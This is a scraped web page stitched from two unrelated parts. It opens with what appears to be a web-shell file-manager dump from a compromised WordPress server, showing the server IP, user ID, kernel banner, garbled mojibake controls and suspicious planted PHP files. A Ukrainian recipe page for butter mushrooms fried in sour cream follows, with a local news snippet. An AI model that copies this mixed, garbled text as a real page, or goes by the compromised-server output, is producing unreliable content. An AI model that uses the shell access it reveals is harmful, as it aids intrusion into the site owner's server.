195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-08-14 13:56:182022-04-19 08:48:45-
_ldɾ 07552022-08-14 13:54:002022-04-18 21:30:13-
_puɾ 07552022-08-14 13:54:032022-04-19 06:15:13-
doskaɾ 07552022-08-14 13:56:192022-05-13 00:21:36-
gboɾ 07552022-08-14 13:54:032022-04-21 16:29:19-
katalogɾ 07552022-08-14 13:54:032022-05-13 00:20:58-
nailɾ 07552022-08-14 13:54:062022-06-17 13:21:44-
testɾ 07552022-08-14 13:54:032022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-14 13:54:032022-04-18 17:42:42-
wp-contentɾ 07552022-08-14 16:08:072022-08-14 16:08:07-
wp-includesɾ 07552022-08-14 13:54:062022-04-18 17:42:24-
.htaccess 06442022-08-14 13:54:062022-06-30 09:23:1921.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
backup.php 06442022-08-13 13:42:572022-08-13 13:42:57772 B
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-08-14 13:54:032022-04-24 10:15:3853 B
index.php 06442022-08-14 16:08:192022-04-18 20:09:52405 B
license.txt 06442022-08-14 13:56:192022-04-18 20:09:5219.45 K
readme.html 06442022-08-14 13:54:062022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
tmp.php 06442022-08-13 13:44:442022-08-13 13:44:44761 B
wp-activate.php 06442022-08-14 15:19:512022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-14 13:55:502022-04-18 20:09:52351 B
wp-comments-post.php 06442022-08-14 13:54:062022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-08-14 13:54:002022-04-18 20:10:482.93 K
wp-config.php 06442022-08-14 15:46:362022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-14 16:08:062022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-14 16:06:252022-04-18 20:09:522.44 K
wp-load.php 06442022-08-14 15:29:382022-04-18 20:09:523.81 K
wp-login.php 06442022-08-14 16:07:082022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-14 15:08:032022-04-18 20:09:528.38 K
wp-settings.php 06442022-08-14 13:54:062022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-14 15:08:562022-04-18 20:09:5231.21 K
wp-trackback.php 06442022-08-14 15:04:152022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-14 15:30:512022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[25] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
Смажені маслюки в сметані – смачний рецепт – Це Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

Смажені маслюки в сметані – смачний рецепт

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Грибний сезон у розпалі? Маслюки зі сметаною – смачно і просто! Ніжний вершковий смак з поєднанням ароматних грибочків – це щось!

Маслюки самі по собі неймовірно смачні гриби – майже як білі, але зі сметаною їх смак стає ще більш яскравим. Спробуйте!

Інгредієнти
– Маслюки 700гр.;
– Цибуля ріпчаста 280гр.;
– Оливкова олія 40мл.;
– Сіль за смаком;
– Сметана 40гр.

Рецепт приготування: 8 простих кроків

1. Гриби переберіть, помийте і почистіть.

2. Наріжте підготовлені маслюки великими шматочками, якщо гриби невеликого розміру – залиште їх цілими. Замочіть в холодній воді з сіллю хвилин на 15.

3. Перед смаженням гриби потрібно довести до кипіння, після чого відкинути на друшляк і промити від слизу.

4. Залиште гриби на 10-15 хвилин в друшляку, щоб стікло максимум води і слизу.

5. Розігрійте пательню з маслом і злегка обсмажте дрібно нарізану цибулю. Ступінь підсмажування – до прозорості. Не переживайте, цибуля дійде до готовності разом з грибами.

6. Додайте на сковорідку до цибулі відварені маслюки які вже стекли, акуратно перемішайте і смажте хвилин 15 на середньому вогні, періодично помішуючи.

7. Додайте до грибів сметану і сіль, перемішайте, накрийте сковорідку кришкою і дайте маслюкам трохи потомитися у цьому соусі.

8. Подавайте на стіл гаряченькими з картоплею або в якості основного блюда.

Смачного!

Переглядів:: 1
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Реєстрація
*
*
*
Пароль не введено
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x